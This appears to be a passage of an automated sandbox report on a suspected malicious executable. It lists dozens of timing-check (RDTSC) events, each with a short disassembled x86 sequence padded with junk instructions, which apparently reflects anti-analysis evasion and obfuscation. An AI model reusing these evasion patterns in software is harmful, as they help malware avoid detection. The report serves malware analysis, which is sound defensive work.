Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 158F8A9 second address: 158F91A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF108C7BF19h 0x00000009 jmp 00007FF108C7BF18h 0x0000000e popad 0x0000000f pushad 0x00000010 jmp 00007FF108C7BF12h 0x00000015 push edx 0x00000016 pop edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 popad 0x0000001a pop esi 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FF108C7BF18h 0x00000022 jnp 00007FF108C7BF08h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 158FA72 second address: 158FA76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 16625A0 second address: 16625AA instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF108C7BF06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 16625AA second address: 16625B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 16625B0 second address: 16625B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1662786 second address: 16627B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873983h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF108873984h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 16627B4 second address: 16627C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF108C7BF0Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 166286A second address: 166286E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1663C81 second address: 1663C85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1663C85 second address: 1663C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FF108873976h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1665539 second address: 1665540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950019 second address: 7950022 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, FB3Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950167 second address: 795016C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 795016C second address: 7950187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dh, al 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF10887397Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950187 second address: 79501E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF108C7BF0Fh 0x00000009 jmp 00007FF108C7BF13h 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007FF108C7BF18h 0x00000015 adc eax, 4A1C4298h 0x0000001b jmp 00007FF108C7BF0Bh 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 xchg eax, edi 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 mov esi, ebx 0x0000002a movsx edi, ax 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79501E6 second address: 79501FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF108873984h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79501FE second address: 795029F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b call dword ptr [75980B60h] 0x00000011 mov eax, 75F3E5E0h 0x00000016 ret 0x00000017 jmp 00007FF108C7BF16h 0x0000001c push 00000044h 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FF108C7BF0Eh 0x00000025 add ecx, 075451B8h 0x0000002b jmp 00007FF108C7BF0Bh 0x00000030 popfd 0x00000031 jmp 00007FF108C7BF18h 0x00000036 popad 0x00000037 pop edi 0x00000038 jmp 00007FF108C7BF10h 0x0000003d xchg eax, edi 0x0000003e pushad 0x0000003f movzx eax, di 0x00000042 mov bx, 90DEh 0x00000046 popad 0x00000047 push eax 0x00000048 pushad 0x00000049 mov ah, 31h 0x0000004b mov dl, 1Fh 0x0000004d popad 0x0000004e xchg eax, edi 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007FF108C7BF10h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 795029F second address: 79502A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79502A3 second address: 79502A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79502A9 second address: 79502BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF10887397Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79502BA second address: 79502BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 795039F second address: 79503C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 jmp 00007FF10887397Dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d je 00007FF176852C6Ah 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov cx, 43D5h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79503C2 second address: 79503E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF108C7BF11h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79503E8 second address: 79503FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873981h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79503FD second address: 7950464 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi], edi 0x0000000b jmp 00007FF108C7BF0Eh 0x00000010 mov dword ptr [esi+04h], eax 0x00000013 jmp 00007FF108C7BF10h 0x00000018 mov dword ptr [esi+08h], eax 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FF108C7BF0Eh 0x00000022 sbb ecx, 664427C8h 0x00000028 jmp 00007FF108C7BF0Bh 0x0000002d popfd 0x0000002e popad 0x0000002f mov dword ptr [esi+0Ch], eax 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950464 second address: 7950468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950468 second address: 795046E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 795046E second address: 7950523 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 mov cx, 5627h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [ebx+4Ch] 0x0000000f jmp 00007FF10887397Ah 0x00000014 mov dword ptr [esi+10h], eax 0x00000017 pushad 0x00000018 call 00007FF10887397Eh 0x0000001d mov bx, cx 0x00000020 pop eax 0x00000021 pushfd 0x00000022 jmp 00007FF108873987h 0x00000027 or ax, 18CEh 0x0000002c jmp 00007FF108873989h 0x00000031 popfd 0x00000032 popad 0x00000033 mov eax, dword ptr [ebx+50h] 0x00000036 jmp 00007FF10887397Eh 0x0000003b mov dword ptr [esi+14h], eax 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 pushfd 0x00000042 jmp 00007FF10887397Dh 0x00000047 and ecx, 787E73B6h 0x0000004d jmp 00007FF108873981h 0x00000052 popfd 0x00000053 jmp 00007FF108873980h 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950523 second address: 795053B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+54h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 795053B second address: 795053F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 795053F second address: 795055A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 795055A second address: 7950625 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF10887397Fh 0x00000009 xor ah, FFFFFFFEh 0x0000000c jmp 00007FF108873989h 0x00000011 popfd 0x00000012 movzx esi, bx 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov dword ptr [esi+18h], eax 0x0000001b jmp 00007FF108873983h 0x00000020 mov eax, dword ptr [ebx+58h] 0x00000023 pushad 0x00000024 mov esi, 77E23F4Bh 0x00000029 movzx esi, bx 0x0000002c popad 0x0000002d mov dword ptr [esi+1Ch], eax 0x00000030 jmp 00007FF108873983h 0x00000035 mov eax, dword ptr [ebx+5Ch] 0x00000038 jmp 00007FF108873986h 0x0000003d mov dword ptr [esi+20h], eax 0x00000040 pushad 0x00000041 movzx esi, bx 0x00000044 mov ecx, edi 0x00000046 popad 0x00000047 mov eax, dword ptr [ebx+60h] 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d jmp 00007FF10887397Eh 0x00000052 pushfd 0x00000053 jmp 00007FF108873982h 0x00000058 and cx, A448h 0x0000005d jmp 00007FF10887397Bh 0x00000062 popfd 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950625 second address: 7950676 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 jmp 00007FF108C7BF10h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esi+24h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov ecx, edx 0x00000016 pushfd 0x00000017 jmp 00007FF108C7BF19h 0x0000001c xor al, FFFFFFC6h 0x0000001f jmp 00007FF108C7BF11h 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79507B4 second address: 79507C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF10887397Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79507C3 second address: 79507E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+0000008Ch] 0x0000000e jmp 00007FF108C7BF0Ch 0x00000013 mov dword ptr [esi+34h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79507E6 second address: 79507EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79507EA second address: 79507F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79507F0 second address: 7950824 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873984h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+18h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF108873987h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950824 second address: 795083C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF108C7BF14h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 795083C second address: 7950856 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF10887397Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+38h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950856 second address: 795085A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 795085A second address: 7950860 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950860 second address: 7950896 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF108C7BF14h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+1Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF108C7BF17h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950896 second address: 7950915 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+3Ch], eax 0x0000000c jmp 00007FF10887397Eh 0x00000011 mov eax, dword ptr [ebx+20h] 0x00000014 pushad 0x00000015 mov bx, cx 0x00000018 mov cx, 98D9h 0x0000001c popad 0x0000001d mov dword ptr [esi+40h], eax 0x00000020 jmp 00007FF108873984h 0x00000025 lea eax, dword ptr [ebx+00000080h] 0x0000002b pushad 0x0000002c movzx eax, dx 0x0000002f mov edi, 618987FEh 0x00000034 popad 0x00000035 push 00000001h 0x00000037 jmp 00007FF108873985h 0x0000003c nop 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950915 second address: 7950919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950919 second address: 795092C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF10887397Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 795092C second address: 7950984 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 call 00007FF108C7BF0Bh 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007FF108C7BF16h 0x00000014 nop 0x00000015 jmp 00007FF108C7BF10h 0x0000001a lea eax, dword ptr [ebp-10h] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FF108C7BF17h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950A05 second address: 7950A0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950A0B second address: 7950A0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950A0F second address: 7950A33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873986h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edi, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950A33 second address: 7950A39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950A39 second address: 7950A6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 1B99C361h 0x00000008 pushfd 0x00000009 jmp 00007FF10887397Eh 0x0000000e xor eax, 076B71F8h 0x00000014 jmp 00007FF10887397Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d test edi, edi 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 push esi 0x00000023 pop edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950A6C second address: 7950AD4 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF108C7BF0Eh 0x00000008 or cx, 4C58h 0x0000000d jmp 00007FF108C7BF0Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 mov dl, 7Bh 0x00000018 popad 0x00000019 popad 0x0000001a js 00007FF176C5AB34h 0x00000020 pushad 0x00000021 movzx ecx, dx 0x00000024 push edi 0x00000025 push eax 0x00000026 pop edi 0x00000027 pop eax 0x00000028 popad 0x00000029 mov eax, dword ptr [ebp-0Ch] 0x0000002c jmp 00007FF108C7BF0Dh 0x00000031 mov dword ptr [esi+04h], eax 0x00000034 pushad 0x00000035 movzx eax, dx 0x00000038 mov ebx, 25C43E2Ch 0x0000003d popad 0x0000003e lea eax, dword ptr [ebx+78h] 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 pushad 0x00000045 popad 0x00000046 jmp 00007FF108C7BF0Ah 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950AD4 second address: 7950B32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF10887397Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000001h 0x0000000b pushad 0x0000000c jmp 00007FF108873984h 0x00000011 push esi 0x00000012 pushad 0x00000013 popad 0x00000014 pop ebx 0x00000015 popad 0x00000016 nop 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov si, di 0x0000001d pushfd 0x0000001e jmp 00007FF10887397Bh 0x00000023 or si, F7EEh 0x00000028 jmp 00007FF108873989h 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950B32 second address: 7950B52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 004C3B02h 0x00000008 push edx 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF108C7BF0Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950B52 second address: 7950B56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950B56 second address: 7950B5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950B5C second address: 7950B80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF10887397Ch 0x00000009 xor eax, 3E5C19C8h 0x0000000f jmp 00007FF10887397Bh 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950B80 second address: 7950BAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 jmp 00007FF108C7BF14h 0x0000000d lea eax, dword ptr [ebp-08h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FF108C7BF0Ah 0x00000019 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950BAD second address: 7950BB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950BB1 second address: 7950BB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950BB7 second address: 7950BBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950BBD second address: 7950BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950BC1 second address: 7950BE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873988h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950BE6 second address: 7950BEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950BEA second address: 7950C07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950C07 second address: 7950C17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF108C7BF0Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950C17 second address: 7950C1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950C1B second address: 7950C33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF108C7BF0Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950C33 second address: 7950CA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF108873987h 0x00000009 sbb esi, 77D82E3Eh 0x0000000f jmp 00007FF108873989h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 nop 0x00000019 pushad 0x0000001a mov edi, 24DBA39Eh 0x0000001f push eax 0x00000020 push edx 0x00000021 pushfd 0x00000022 jmp 00007FF108873985h 0x00000027 adc cl, 00000026h 0x0000002a jmp 00007FF108873981h 0x0000002f popfd 0x00000030 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950CFF second address: 7950D03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950D03 second address: 7950D09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950D09 second address: 7950D7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FF108C7BF12h 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e js 00007FF176C5A89Bh 0x00000014 jmp 00007FF108C7BF17h 0x00000019 mov eax, dword ptr [ebp-04h] 0x0000001c jmp 00007FF108C7BF16h 0x00000021 mov dword ptr [esi+08h], eax 0x00000024 jmp 00007FF108C7BF10h 0x00000029 lea eax, dword ptr [ebx+70h] 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FF108C7BF0Ah 0x00000035 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950D7E second address: 7950D8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF10887397Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
